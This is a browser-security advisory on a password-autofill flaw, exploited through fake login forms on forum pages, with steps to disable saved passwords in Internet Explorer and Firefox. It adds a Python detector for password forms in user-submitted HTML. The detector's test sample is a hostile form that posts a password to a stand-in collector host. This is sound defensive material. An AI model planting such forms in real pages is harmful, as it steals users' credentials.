If you have your internet browser set to store your usernames and passwords, disable it immediately.

A vulnerability was just discovered in both Microsoft’s Internet Explorer and Mozilla’s Firefox browsers that allows a hacker to create a fake login page. When your browser auto-fills the username and password into the form, the data is passed off to the hacker.

This vulnerability has been named a "reverse cross-site request" vulnerability by its discoverer, Robert Chapin. It has been found on at least one MySpace.com page and is a risk to any user who goes to forum or blog websites.

So far, there is no known fix except to disable the password fill-in feature.

  • In Microsoft Internet Explorer, use the menu to go to Tools/Internet Options. On the Content tab, select AutoComplete and make sure that "Usernames and passwords on forms" is not checked. (If the entire line is grayed out or "ghosted", you are okay.) You might want to click the "Clear Passwords" button while you’re here just in case there were some in history.
  • In Firefox, use the menu to go to Tools/Options. On the Security tab, make sure that "Remember passwords for sites" is not checked. Click on the "Show Passwords" button to remove any that have been saved previously.
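
For operators of forum or blog sites, one way to catch the kind of fake login form described above before a post is published. This is an added example, not code from the original article or from Robert Chapin. It assumes the site accepts user-submitted HTML; `scan_user_html`, `LoginFormFinder` and the `.example` hosts are hypothetical names.

```python
# Assumption (not from the article): the site accepts user-submitted HTML.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port) triple used to compare where two URLs live."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.hostname, parts.port)

class LoginFormFinder(HTMLParser):
    """Records every <form> in a fragment that contains a password field."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []
        self._form = None  # the form currently open, if any
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.end_form()  # tolerate an unclosed earlier form
            # A missing or empty action submits back to the hosting page.
            target = urljoin(self.page_url, attrs.get("action") or "")
            self._form = {"target": target, "password": False}
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "").strip().lower() == "password":
                self._form["password"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self.end_form()
    def end_form(self):
        form, self._form = self._form, None
        if form and form["password"]:
            off_site = origin(form["target"]) != origin(self.page_url)
            self.findings.append({"target": form["target"], "off_site": off_site})

def scan_user_html(fragment, page_url):
    """Return one finding per password-bearing form in user-submitted HTML."""
    finder = LoginFormFinder(page_url)
    finder.feed(fragment)
    finder.close()
    finder.end_form()  # a form left open at end of input still counts
    return finder.findings

# Constructed sample: a forum post carrying a form with a password field.
PAGE = "https://forum.example/thread/42"
POST = ('<form action="https://collector.example/save" method="post">'
        '<input name="user"><input type="PASSWORD" name="pass"></form>')
print(scan_user_html(POST, PAGE))
```

Any finding in user-submitted content is a reason to strip or reject the markup; `off_site` marks forms whose submission would leave the site.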
